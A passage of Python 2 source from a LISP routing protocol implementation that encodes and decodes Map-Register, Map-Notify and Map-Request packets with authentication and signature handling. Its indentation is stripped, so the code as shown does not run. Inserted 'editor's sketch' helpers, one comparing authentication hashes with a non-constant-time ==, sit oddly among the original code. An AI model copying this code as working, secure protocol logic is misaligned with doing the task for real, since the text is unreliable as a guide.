#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
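#
# lisp_example_authenticate_map_register()
#
# Editor's sketch of the authentication flow: encode() above leaves a
# zeroed auth field, the sender hashes the entire message with the site's
# shared password, and encode_auth() splices the hash back in. Assumes the
# module's lisp_hash_me() helper (used the same way by lisp_map_notify).
#
def lisp_example_authenticate_map_register(map_register, packet, password):
    hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
    map_register.auth_data = hashval
    return(map_register.encode_auth(packet))
#enddef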
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
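#
# lisp_example_verify_map_notify()
#
# Editor's sketch: verifying a received Map-Notify. decode() above returns
# the message with its auth field zeroed, so the receiver recomputes the
# hash over that buffer and compares against the transmitted auth-data.
# Assumes lisp_concat_auth_data() and lisp_hash_me() yield the same
# representation, which is how encode() uses them.
#
def lisp_example_verify_map_notify(map_notify, zeroed_packet, password):
    hashval = lisp_hash_me(zeroed_packet, map_notify.alg_id, password, False)
    return(hashval == map_notify.auth_data)
#enddef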
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA-based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as an LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig>" }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in the file. (Note
# that the code below parses keys with the python ecdsa module, which
# expects ECDSA rather than RSA PEM key-pairs.)
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
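# Editor's sketch, a hypothetical helper mirroring sign_map_request() in
# the class below: sign nonce + source-EID + target-EID with an ECDSA
# signing key read from a PEM file and base64-encode the signature for the
# JSON LCAF.
#
def lisp_example_sign_request(privkey_pem, nonce, source_eid, target_eid):
    key = ecdsa.SigningKey.from_pem(privkey_pem)
    sig_data = lisp_hex_string(nonce) + source_eid + target_eid
    return(binascii.b2a_base64(key.sign(sig_data)))
#enddef
#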
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get the JSON-encoded afi-address; we are expecting an AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state when the ITR has
# stopped doing key exchange after previously doing so.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
